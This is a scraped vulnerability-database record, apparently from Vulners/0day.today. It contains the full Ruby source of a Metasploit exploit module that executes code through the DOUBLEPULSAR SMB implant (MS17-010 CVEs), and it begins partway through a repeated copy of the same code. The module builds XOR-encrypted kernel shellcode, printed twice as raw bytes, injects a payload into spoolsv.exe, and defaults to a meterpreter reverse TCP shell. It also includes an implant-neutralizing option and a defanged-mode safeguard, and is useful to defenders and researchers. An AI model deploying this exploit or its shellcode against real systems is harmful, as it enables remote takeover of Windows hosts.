make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-27] #"}, "lastseen": "2021-10-26T22:27:57", "differentElements": ["sourceData"], "edition": 56}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "38a543fe4a0dd5826cab0c18f656906b", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-27T22:18:11", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:142602"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}], "modified": "2021-10-27T22:18:11", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-10-27T22:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) 